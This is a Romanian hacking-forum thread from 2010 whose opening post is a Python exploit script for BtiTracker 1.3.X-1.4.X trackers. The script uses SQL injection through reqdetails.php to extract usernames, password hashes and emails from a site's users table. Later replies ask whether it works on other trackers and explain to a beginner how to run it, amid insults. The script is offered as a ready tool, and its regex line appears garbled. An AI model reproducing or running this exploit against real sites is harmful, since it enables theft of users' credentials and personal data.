Guest .TinKode. Posted June 10, 2010 Report Share Posted June 10, 2010 #!/usr/bin/env python# ################################################################################# ______ ____ __ [ xpl0it ] ##/\__ _\ /\ _`\ __/\ \__ ##\/_/\ \/ ___\ \,\L\_\ __ ___ __ __ _ __ /\_\ \ ,_\ __ __ ## \ \ \ /' _ `\/_\__ \ /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \ ## \_\ \__/\ \/\ \/\ \L\ \/\ __//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \ ## /\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\ \ \_\ \__\\/`____ \ ## \/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/ \/_/ \/_/\/__/ `/___/> \ ## _________________ /\___/ ## www.insecurity.ro \/__/ ## # ################################################################################ # [ BtiTracker 1.3.X - 1.4.X Exploit ] # # Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches ## Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff # ################################################################################ # Because we care, we're security aware # ################################################################################ import sys, urllib2, reif len(sys.argv) < 2: print "===============================================================" print "============== BtiTracker 1.3.X - 1.4.X Exploit ===============" print "===============================================================" print "= Discovered and coded by TinKode =" print "= www.InSecurity.ro =" print "= =" print "= Local Command: =" print "= ./isr.py [http://webshit] [ID] =" print "= =" print "===============================================================" exit()if len(sys.argv) < 3: id = 1else: id = sys.argv[2]shit = sys.argv[1]if shit[-1:] != "/": shit += "/"url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--"print "\n"print "============================================="print "================= InSecurity ================"print "============================================="html = urllib2.urlopen(url).read()slobod = re.findall(r"--(.*)\[0-9a-fA-F]{32})\.*)--", html)if len(slobod) > 0: print "ID : " + str(id) print "Username : " + slobod[0][0] print "Password : " + slobod[0][1] print "EMail : " + slobod[0][2] print "=============================================" print "================= InSecurity ================" print "============================================="else: print "Ai luat-o la gaoaza..."#InSecurity.ro - RomaniaSource: BtiTracker 1.3.X - 1.4.X Exploit Quote Link to comment Share on other sites More sharing options...
alexalghisi Posted June 10, 2010 Report Share Posted June 10, 2010 si ... ce face ? Quote Link to comment Share on other sites More sharing options...
CyberWolf08 Posted June 10, 2010 Report Share Posted June 10, 2010 E un exploit pentru siteuri care folosesc BtiTracker. Extrage conturile inregistrate pe site daca nu ma insel.@TinKode : Borned???? WTF, vezi semnatura... Unde n-ai invatat engleza? Quote Link to comment Share on other sites More sharing options...
alexalghisi Posted June 10, 2010 Report Share Posted June 10, 2010 (edited) si parola ?L.E: am observat ca si parola si emailul .. functioneaza oare pe orice tracker ? chiar si pe filelist? :O Edited June 10, 2010 by alexalghisi Quote Link to comment Share on other sites More sharing options...
begood Posted June 10, 2010 Report Share Posted June 10, 2010 bravo tinky ! Quote Link to comment Share on other sites More sharing options...
strike Posted June 10, 2010 Report Share Posted June 10, 2010 si parola ?L.E: am observat ca si parola si emailul .. functioneaza oare pe orice tracker ? chiar si pe filelist? :OMerge doar pe trackerele care folosesc BtiTracker.Filelist nu e unul dintre ele:) Quote Link to comment Share on other sites More sharing options...
Alynutza Posted June 22, 2010 Report Share Posted June 22, 2010 Cum se foloseste? Am downloadat si e o chestie cu extensia .py Quote Link to comment Share on other sites More sharing options...
Flubber Posted June 22, 2010 Report Share Posted June 22, 2010 Cum se foloseste? Am downloadat si e o chestie cu extensia .pyTi-o bagi in pizda! Quote Link to comment Share on other sites More sharing options...
Alynutza Posted June 22, 2010 Report Share Posted June 22, 2010 Ti-o bagi in pizda!M? da nesimtit mai esti:|Bine ca ai luat banPS:Ma ajuta si pe mine cineva(pe mess) cu programele astea? Quote Link to comment Share on other sites More sharing options...
Nytro Posted June 22, 2010 Report Share Posted June 22, 2010 Descarca asta: http://downloads.activestate.com/ActivePython/releases/2.6.5.12/ActivePython-2.6.5.12-win32-x86.msiIntrii in cmd, mergi in directorul in care ai instalat python folosind "cd", copiezi in acel directorul exploitul, pui extensia ".py", apoi rulezi "python exploit.py". Parca asa era cu Active Python.Pff, dar mai bine lasa, mai intai sa prinzi notiunile de baza, apoi treci la folosirea exploiturilor. Oricum sunt tutoriale despre cum sa faci asta. Quote Link to comment Share on other sites More sharing options...
Alynutza Posted June 23, 2010 Report Share Posted June 23, 2010 Nytro nu am inteles mai nimic din ce ai zis:D Dar oricum...acuma trebuie sa invat notiuunile de baza Quote Link to comment Share on other sites More sharing options...
Flubber Posted June 25, 2010 Report Share Posted June 25, 2010 Nytro nu am inteles mai nimic din ce ai zis:D Dar oricum...acuma trebuie sa invat notiuunile de bazaCum de te-ai prins? Era greu sa cauti pe google ".py extension" sa vezi ca se refera la extensia care o foloseste limbajul de programare Python? Dupa care cautai "Python Programming Language" si invatai limbajul de programare sau aruncai un ochi peste.Data viitoare foloseste Google si nu mai pune intrebari stupide! Foloseste-ti creierul.Si stai linistit(a), am revenit. Quote Link to comment Share on other sites More sharing options...
strike Posted June 27, 2010 Report Share Posted June 27, 2010 @Flubber si eu care ma bucuram:)) Quote Link to comment Share on other sites More sharing options...
